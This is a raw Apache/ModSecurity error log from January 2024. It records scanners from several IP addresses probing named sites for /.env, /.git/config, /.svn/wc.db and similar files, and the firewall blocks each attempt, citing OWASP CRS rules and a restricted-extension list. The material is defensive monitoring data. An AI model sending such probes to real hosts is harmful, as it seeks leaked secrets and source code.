[Fri Jan 19 06:11:32.574659 2024] [:error] [pid 458286] [client 139.84.145.2:38762] [client 139.84.145.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "ZaoEhCew--ROYwWR4d2PgwAAAAo"]
[Fri Jan 19 06:11:32.574833 2024] [:error] [pid 458286] [client 139.84.145.2:38762] [client 139.84.145.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "ZaoEhCew--ROYwWR4d2PgwAAAAo"]
[Fri Jan 19 09:01:51.890614 2024] [authz_core:error] [pid 466194] [client 139.144.150.23:35178] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Jan 19 09:01:53.376306 2024] [:error] [pid 466197] [client 139.144.150.23:35212] [client 139.144.150.23] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZaoscWvQXPKCej1-im5JQgAAAAc"]
[Fri Jan 19 09:01:53.376536 2024] [:error] [pid 466197] [client 139.144.150.23:35212] [client 139.144.150.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZaoscWvQXPKCej1-im5JQgAAAAc"]
[Fri Jan 19 09:01:53.376727 2024] [:error] [pid 466197] [client 139.144.150.23:35212] [client 139.144.150.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZaoscWvQXPKCej1-im5JQgAAAAc"]
[Fri Jan 19 09:01:53.430281 2024] [:error] [pid 466197] [client 139.144.150.23:35220] [client 139.144.150.23] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZaoscWvQXPKCej1-im5JQwAAAAc"]
[Fri Jan 19 09:01:53.430494 2024] [:error] [pid 466197] [client 139.144.150.23:35220] [client 139.144.150.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZaoscWvQXPKCej1-im5JQwAAAAc"]
[Fri Jan 19 09:01:53.430671 2024] [:error] [pid 466197] [client 139.144.150.23:35220] [client 139.144.150.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZaoscWvQXPKCej1-im5JQwAAAAc"]
[Fri Jan 19 09:01:53.484212 2024] [:error] [pid 466136] [client 139.144.150.23:35226] [client 139.144.150.23] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZaoscdT9-x06-a5RhiXxeAAAAAI"]
[Fri Jan 19 09:01:53.484432 2024] [:error] [pid 466136] [client 139.144.150.23:35226] [client 139.144.150.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZaoscdT9-x06-a5RhiXxeAAAAAI"]
[Fri Jan 19 09:01:53.484586 2024] [:error] [pid 466136] [client 139.144.150.23:35226] [client 139.144.150.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZaoscdT9-x06-a5RhiXxeAAAAAI"]
[Sat Jan 20 12:51:23.071253 2024] [authz_core:error] [pid 486700] [client 3.88.161.179:58586] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Sat Jan 20 20:46:53.570689 2024] [:error] [pid 496520] [client 3.88.161.179:38282] [client 3.88.161.179] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZawjLex37Rt5OTlcZPX7eAAAAAc"]
[Sat Jan 20 20:46:53.570990 2024] [:error] [pid 496520] [client 3.88.161.179:38282] [client 3.88.161.179] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZawjLex37Rt5OTlcZPX7eAAAAAc"]
[Sat Jan 20 20:46:53.571164 2024] [:error] [pid 496520] [client 3.88.161.179:38282] [client 3.88.161.179] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZawjLex37Rt5OTlcZPX7eAAAAAc"]
[Sat Jan 20 21:24:00.343282 2024] [:error] [pid 486699] [client 3.88.161.179:52716] [client 3.88.161.179] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "Zawr4LhlGhcNessAOzZkGAAAAAQ"]
[Sat Jan 20 21:24:00.343699 2024] [:error] [pid 486699] [client 3.88.161.179:52716] [client 3.88.161.179] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "Zawr4LhlGhcNessAOzZkGAAAAAQ"]
[Sat Jan 20 21:24:00.343913 2024] [:error] [pid 486699] [client 3.88.161.179:52716] [client 3.88.161.179] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "Zawr4LhlGhcNessAOzZkGAAAAAQ"]
[Sun Jan 21 00:40:52.960088 2024] [:error] [pid 505358] [client 3.88.161.179:39518] [client 3.88.161.179] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /core/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "ZaxaBK9wq1c-J5EyXElKlgAAAAM"]
[Sun Jan 21 00:40:52.960430 2024] [:error] [pid 505358] [client 3.88.161.179:39518] [client 3.88.161.179] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "ZaxaBK9wq1c-J5EyXElKlgAAAAM"]
[Sun Jan 21 00:40:52.960625 2024] [:error] [pid 505358] [client 3.88.161.179:39518] [client 3.88.161.179] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "ZaxaBK9wq1c-J5EyXElKlgAAAAM"]
[Sun Jan 21 02:49:36.428831 2024] [:error] [pid 505358] [client 3.88.161.179:41878] [client 3.88.161.179] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.svn/wc.db"] [unique_id "Zax4MK9wq1c-J5EyXElKnQAAAAM"]
[Sun Jan 21 02:49:36.429028 2024] [:error] [pid 505358] [client 3.88.161.179:41878] [client 3.88.161.179] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.svn/wc.db"] [unique_id "Zax4MK9wq1c-J5EyXElKnQAAAAM"]
[Sun Jan 21 02:49:36.429287 2024] [:error] [pid 505358] [client 3.88.161.179:41878] [client 3.88.161.179] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.svn/wc.db"] [unique_id "Zax4MK9wq1c-J5EyXElKnQAAAAM"]
[Sun Jan 21 02:49:36.429480 2024] [:error] [pid 505358] [client 3.88.161.179:41878] [client 3.88.161.179] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.svn/wc.db"] [unique_id "Zax4MK9wq1c-J5EyXElKnQAAAAM"]
[Tue Jan 23 02:59:32.078496 2024] [authz_core:error] [pid 554019] [client 128.199.62.55:42906] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Jan 23 02:59:32.497927 2024] [:error] [pid 554021] [client 128.199.62.55:43024] [client 128.199.62.55] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Za8dhL2SEm6nlgOjuG0FEQAAAAs"]
[Tue Jan 23 02:59:32.498144 2024] [:error] [pid 554021] [client 128.199.62.55:43024] [client 128.199.62.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Za8dhL2SEm6nlgOjuG0FEQAAAAs"]
[Tue Jan 23 02:59:32.498315 2024] [:error] [pid 554021] [client 128.199.62.55:43024] [client 128.199.62.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Za8dhL2SEm6nlgOjuG0FEQAAAAs"]
[Tue Jan 23 02:59:32.588310 2024] [:error] [pid 554055] [client 128.199.62.55:43060] [client 128.199.62.55] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Za8dhMszVZiYuO4ro7AiMgAAAAM"]
[Tue Jan 23 02:59:32.588520 2024] [:error] [pid 554055] [client 128.199.62.55:43060] [client 128.199.62.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Za8dhMszVZiYuO4ro7AiMgAAAAM"]
[Tue Jan 23 02:59:32.588744 2024] [:error] [pid 554055] [client 128.199.62.55:43060] [client 128.199.62.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Za8dhMszVZiYuO4ro7AiMgAAAAM"]
[Tue Jan 23 02:59:32.660407 2024] [:error] [pid 554058] [client 128.199.62.55:43096] [client 128.199.62.55] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Za8dhBbNH01YsNmQymuCDwAAAAg"]
[Tue Jan 23 02:59:32.660634 2024] [:error] [pid 554058] [client 128.199.62.55:43096] [client 128.199.62.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Za8dhBbNH01YsNmQymuCDwAAAAg"]
[Tue Jan 23 02:59:32.660793 2024] [:error] [pid 554058] [client 128.199.62.55:43096] [client 128.199.62.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Za8dhBbNH01YsNmQymuCDwAAAAg"]
[Tue Jan 23 02:59:55.360032 2024] [:error] [pid 554020] [client 2.58.56.121:39844] [client 2.58.56.121] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Za8dm6SVS-NJb4JOnk6RfAAAAAc"]
[Tue Jan 23 02:59:55.360287 2024] [:error] [pid 554020] [client 2.58.56.121:39844] [client 2.58.56.121] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Za8dm6SVS-NJb4JOnk6RfAAAAAc"]
[Tue Jan 23 02:59:55.360464 2024] [:error] [pid 554020] [client 2.58.56.121:39844] [client 2.58.56.121] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Za8dm6SVS-NJb4JOnk6RfAAAAAc"]
[Tue Jan 23 04:36:40.663070 2024] [:error] [pid 554159] [client 104.234.204.32:44092] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Za80SMXa89KBr1TfBh29pgAAAAU"]
[Tue Jan 23 04:36:40.663338 2024] [:error] [pid 554159] [client 104.234.204.32:44092] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Za80SMXa89KBr1TfBh29pgAAAAU"]
[Tue Jan 23 04:36:40.663497 2024] [:error] [pid 554159] [client 104.234.204.32:44092] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Za80SMXa89KBr1TfBh29pgAAAAU"]
